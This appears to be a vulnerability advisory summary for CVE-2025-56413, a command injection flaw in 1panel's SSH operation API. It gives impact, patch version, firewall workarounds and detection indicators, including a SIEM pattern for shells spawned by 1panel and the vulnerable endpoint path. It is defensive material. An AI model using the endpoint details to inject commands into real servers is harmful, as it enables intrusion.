CVE-2025-56413
📋 TL;DR
This CVE describes an OS command injection vulnerability in 1panel's SSH operation function that allows attackers to execute arbitrary commands on the server. Attackers can exploit this by sending specially crafted requests to the vulnerable API endpoint. All systems running the affected 1panel version are at risk.
💻 Affected Systems
- 1panel
📦 What is this software?
1panel by Fit2cloud
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attackers to execute arbitrary commands with the privileges of the 1panel process, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.
Likely Case
Unauthorized command execution leading to data exfiltration, lateral movement within the network, or service disruption.
If Mitigated
Limited impact if proper network segmentation and least privilege principles are implemented, though the vulnerability still provides initial access.
🎯 Exploit Status
Exploitation requires authentication to the 1panel interface. The vulnerability is in a core SSH management function that attackers with valid credentials can access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.0.9 or later
Vendor Advisory: https://github.com/1Panel-dev/1Panel
Restart Required: Yes
Instructions:
1. Backup your 1panel configuration and data. 2. Update 1panel to version 2.0.9 or later using the built-in update mechanism or manual installation. 3. Restart the 1panel service. 4. Verify the update was successful.
🔧 Temporary Workarounds
Disable SSH Operations
linuxTemporarily disable SSH operation functionality in 1panel to prevent exploitation.
# Modify 1panel configuration to disable SSH operations
# Check 1panel documentation for specific configuration options
Network Access Control
linuxRestrict access to the 1panel API endpoint to trusted IP addresses only.
# Example using iptables
iptables -A INPUT -p tcp --dport 1panel_port -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 1panel_port -j DROP
🧯 If You Can't Patch
- Implement strict network segmentation to isolate 1panel instances from critical systems
- Apply principle of least privilege to 1panel service accounts and monitor for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Check if 1panel version is 2.0.8 by accessing the web interface or checking the installation directory.Check Version:
docker exec 1panel cat /opt/1panel/version || cat /opt/1panel/versionVerify Fix Applied:
Verify the version has been updated to 2.0.9 or later in the 1panel web interface or via version check command.📡 Detection & Monitoring
Log Indicators:
- Unusual SSH operation requests in 1panel logs
- Suspicious command execution patterns in system logs
- Multiple failed authentication attempts followed by SSH operations
Network Indicators:
- Unusual outbound connections from 1panel server
- Traffic to the /api/v2/hosts/ssh/operate endpoint with suspicious parameters
SIEM Query:
source="1panel" AND (uri_path="/api/v2/hosts/ssh/operate" AND operation="*") OR (process="bash" OR process="sh" AND parent_process="1panel")